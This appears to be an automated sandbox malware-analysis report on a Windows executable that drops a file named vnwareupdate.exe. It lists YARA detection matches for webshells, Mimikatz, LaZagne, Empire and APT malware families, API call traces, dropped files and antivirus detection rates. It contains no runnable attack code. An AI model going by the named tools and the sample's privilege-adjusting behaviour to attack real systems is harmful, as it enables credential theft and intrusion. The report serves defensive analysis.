Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_ntevt date = 2017-04-15, hash1 = 4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld date = 2017-04-15, hash5 = 8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46, hash4 = 551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e, hash3 = c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3, hash2 = 320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557, hash1 = 9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 date = 2017-04-15, hash2 = 5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 date = 2017-04-15, hash5 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash4 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash3 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, hash2 = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_scanner_output date = 2017-04-17, author = Florian Roth, description = Detects output generated by EQGRP scanner.exe, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Obfuscated_VBS_April17 date = 2017-04-21, author = Florian Roth, description = Detects cloaked Mimikatz in VBS obfuscation, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Obfuscated_JS_April17 date = 2017-04-21, author = Florian Roth, description = Detects cloaked Mimikatz in JS obfuscation, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.316499473.0000000006860000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 0000000A.00000003.322872020.0000000006854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Fierce2 date = 01.07.2014, author = Florian Roth, description = This signature detects the Fierce2 domain scanner, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx description = Web Shell - from files Shell [ci
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 00000013.00000003.464807403.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire_Invoke_Shellcode date = 2015-08-06, author = Florian Roth, description = Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, reference = https://github.com/PowerShellEmpire/Empire, license = https://creativecommons.org/licenses/by-nc/4.0/, score = fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438
Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 00000013.00000002.542830535.0000000002FAE000.00000004.00000040.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Volgmer_Malware date = 2017-11-15, hash5 = 6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1, hash4 = e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11, hash3 = eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5, hash2 = 8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b, hash1 = ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd, author = Florian Roth, description = Detects Volgmer malware as reported in US CERT TA17-318B, hash8 = 1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d, hash7 = 53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d, hash6 = fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9, reference = https://www.us-cert.gov/ncas/alerts/TA17-318B, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ProcessInjector_Gen date = 2018-04-23, author = Florian Roth, description = Detects a process injection utility that can be used ofr good and bad purposes, reference = https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazagne_PW_Dumper date = 2018-03-22, author = Markus Neis / Florian Roth, description = Detects Lazagne PW Dumper, reference = https://github.com/AlessandroZ/LaZagne/releases/, score =
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_shellpop_Bash date = 2018-05-18, hash1 = 36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b, author = Tobias Michalski, description = Detects susupicious bash command, reference = https://github.com/0x00-0x00/ShellPop
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazarus_Dec_17_5 date = 2017-12-20, hash1 = db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471, author = Florian Roth, description = Detects Lazarus malware from incident in Dec 2017, reference = https://goo.gl/8U6fY2, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Turla_Agent_BTZ_Gen_1 date = 2018-06-16, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = Internal Research, score = c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Turla_Mal_Script_Jan18_1 date = 2018-01-19, hash1 = 180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc, author = Florian Roth, description = Detects Turla malicious script, reference = https://ghostbin.com/paste/jsph7, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_Obfuscated_Mal_Feb18_1 date = 2018-02-12, hash3 = e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74, hash2 = c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036, hash1 = 06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab, author = Florian Roth, description = Detects malicious obfuscated VBS observed in February 2018, reference = https://goo.gl/zPsn83, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_ScanCopyPDF_Feb18 date = 2018-02-14, hash1 = 6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be, author = Florian Roth, description = Auto-generated rule - file Scan Copy.pdf.com, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_msfconsole date = 2017-12-24, hash1 = 662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_OSX date = 2017-12-24, hash2 = b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3, hash1 = 2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Silence_malware_2 date = 2017-11-01, hash1 = 75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27, author = Florian Roth, description = Detects malware sample mentioned in the Silence report on Securelist, reference = https://securelist.com/the-silence/83009/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_PSImage date = 2017-12-16, author = Florian Roth, description = Detects a command to execute PowerShell from String, reference = https://github.com/peewpw/Invoke-PSImage, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_apt15_royaldll sha256 = bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d, author = David Cannings, description = DLL implant, originally rights.dll and runs as a service
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.325067585.0000000002E7E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Fierce2 date = 01.07.2014, author = Florian Roth, description = This signature detects the Fierce2 domain scanner, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx description = Web Shell - from files Shell [ci
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 00000013.00000003.478269987.0000000002FAD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_PHP_b37 date = 2014/01/28, author = Florian Roth, description = Web Shell - file b37.php, score = 0421445303cfd0ec6bc20b3846e30ff0
Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Volgmer_Malware date = 2017-11-15, hash5 = 6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1, hash4 = e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11, hash3 = eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5, hash2 = 8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b, hash1 = ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd, author = Florian Roth, description = Detects Volgmer malware as reported in US CERT TA17-318B, hash8 = 1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d, hash7 = 53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d, hash6 = fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9, reference = https://www.us-cert.gov/ncas/alerts/TA17-318B, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ProcessInjector_Gen date = 2018-04-23, author = Florian Roth, description = Detects a process injection utility that can be used ofr good and bad purposes, reference = https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazagne_PW_Dumper date = 2018-03-22, author = Markus Neis / Florian Roth, description = Detects Lazagne PW Dumper, reference = https://github.com/AlessandroZ/LaZagne/releases/, score =
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_shellpop_Bash date = 2018-05-18, hash1 = 36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b, author = Tobias Michalski, description = Detects susupicious bash command, reference = https://github.com/0x00-0x00/ShellPop
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazarus_Dec_17_5 date = 2017-12-20, hash1 = db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471, author = Florian Roth, description = Detects Lazarus malware from incident in Dec 2017, reference = https://goo.gl/8U6fY2, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Turla_Agent_BTZ_Gen_1 date = 2018-06-16, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = Internal Research, score = c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Turla_Mal_Script_Jan18_1 date = 2018-01-19, hash1 = 180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc, author = Florian Roth, description = Detects Turla malicious script, reference = https://ghostbin.com/paste/jsph7, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_Obfuscated_Mal_Feb18_1 date = 2018-02-12, hash3 = e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74, hash2 = c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036, hash1 = 06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab, author = Florian Roth, description = Detects malicious obfuscated VBS observed in February 2018, reference = https://goo.gl/zPsn83, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_ScanCopyPDF_Feb18 date = 2018-02-14, hash1 = 6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be, author = Florian Roth, description = Auto-generated rule - file Scan Copy.pdf.com, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_msfconsole date = 2017-12-24, hash1 = 662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.rans.troj.expl.evad.mine.winEXE@15/1031@0/0

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040320C
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C46250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,	3_2_02C46250
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D56250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,	5_2_02D56250
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DB6250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,	8_2_02DB6250
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BB6250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,	9_2_02BB6250
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BA6250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,	10_2_02BA6250

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Code function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004044D1

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Code function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,

0_2_004020D1

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

File created: C:\Users\user\Desktop\00554e26-4141-4a67-98c4-9454bf8d1c70.dll

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

File created: C:\Users\user\AppData\Local\Temp\nswAFA.tmp

Jump to behavior

Source: GZe6EcSTpO.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GZe6EcSTpO.exe	Virustotal: Detection: 52%
Source: GZe6EcSTpO.exe	ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

